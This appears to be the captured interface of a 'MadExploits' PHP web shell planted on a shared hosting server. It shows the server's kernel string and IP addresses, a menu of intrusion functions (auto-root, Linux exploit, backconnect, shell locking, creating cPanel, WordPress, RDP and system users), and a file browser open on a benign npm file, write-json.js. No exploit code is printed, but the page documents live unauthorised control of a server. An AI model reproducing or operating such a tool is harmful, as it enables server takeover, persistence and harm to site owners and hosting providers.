Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.17.110.119
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
libnpmversion /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
commit.js
425
B
-rw-r--r--
enforce-clean.js
837
B
-rw-r--r--
index.js
805
B
-rw-r--r--
read-json.js
335
B
-rw-r--r--
retrieve-tag.js
384
B
-rw-r--r--
tag.js
470
B
-rw-r--r--
version.js
3.29
KB
-rw-r--r--
write-json.js
524
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : write-json.js
// write the json back, preserving the line breaks and indent const { promisify } = require('util') const writeFile = promisify(require('fs').writeFile) const kIndent = Symbol.for('indent') const kNewline = Symbol.for('newline') module.exports = async (path, pkg) => { const { [kIndent]: indent = 2, [kNewline]: newline = '\n', } = pkg delete pkg._id const raw = JSON.stringify(pkg, null, indent) + '\n' const data = newline === '\n' ? raw : raw.split('\n').join(newline) return writeFile(path, data) }
Close